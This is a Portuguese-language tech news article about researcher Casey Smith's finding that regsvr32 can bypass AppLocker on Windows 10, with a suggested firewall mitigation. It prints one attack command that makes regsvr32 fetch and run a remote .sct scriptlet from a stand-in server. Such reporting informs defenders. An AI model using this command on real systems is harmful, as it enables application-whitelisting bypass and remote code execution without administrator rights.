O Regsvr32 pode ser usado para ignorar o applocker no Windows 10

Vídeo: Regsvr32 Windows applocker bypassed to execute remote payload, Kali Linux 2024

Vídeo: Regsvr32 Windows applocker bypassed to execute remote payload, Kali Linux 2024
Anonim

Um pesquisador do Colorado, Casey Smith, descobriu que o Regsvr32 pode ser usado para ignorar o AppLocker no Windows 10, e esse é um grande problema para os usuários de computador, especialmente aqueles no ambiente de negócios.

O AppLocker foi introduzido pela primeira vez no Windows 7 e Windows Server 2008 R2. Ele foi projetado para permitir que os administradores especifiquem qual grupo ou usuários podem tirar proveito de alguns ou de todos os aplicativos com base na identidade exclusiva dos arquivos. Se você é uma pessoa que tende a usar o AppLocker, é de conhecimento geral que ele pode ser usado para criar certas regras para permitir que os aplicativos sejam executados ou interrompidos.

Para aqueles que desconhecem, o Regvr32 pode ser usado para registrar e cancelar o registro de DLLs. Essa não é uma ferramenta de um clique, pois é um utilitário de linha de comando; portanto, apenas usuários avançados de computador devem procurar tirar proveito do que ela tem a oferecer.

Entendemos que, ao usar essa técnica, ela não altera o registro do sistema do computador, o que dificulta aos administradores saberem se foram feitas alterações.

regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll

“O incrível aqui é que o regsvr32 já tem conhecimento de proxy, usa TLS, segue redirecionamentos, etc. … E … Você adivinhou um binário padrão MS assinado e padrão. Então, tudo que você precisa fazer é hospedar o arquivo.s.sct em um local que você controla ”, escreveu Smith.

A técnica acima não requer privilégios administrativos e não altera o registro. Além disso, os scripts podem ser chamados por HTTP ou HTTPS. No momento, a Microsoft não lançou um patch para esse pequeno problema, portanto, a única opção neste momento é bloquear o Regsvr32 por meio do Firewall do Windows.

Curiosamente, a gigante do software ainda não respondeu sobre esse problema de segurança enfrentado por seu sistema operacional. Agora que está aberto, esperamos ouvir algo da empresa, além de conversas sobre um futuro patch.

O Regsvr32 pode ser usado para ignorar o applocker no Windows 10